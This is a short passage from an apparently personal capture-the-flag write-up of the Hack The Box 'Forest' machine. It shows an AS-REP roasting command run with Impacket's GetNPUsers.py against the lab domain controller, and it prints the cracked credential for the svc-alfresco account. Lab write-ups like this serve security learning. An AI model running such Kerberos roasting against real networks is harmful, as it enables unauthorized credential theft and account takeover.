Kerberos

With the valid users that we got based on the RPC ENumeration we can potentially get TGTs for these users and crack them.

python3 GetNPUsers.py  htb.local/ -dc-ip 10.10.10.161 -no-pass -request -usersfile /home/kali/Forest/results/10.10.10.161/userlist.txt

I ran the following command to try to get a TGT.

The user svc-alfresco had a TGT.

Cracking the TGT allowed me to get the following credentials.

svc-alfresco:s3rvice

Last updated 2 years ago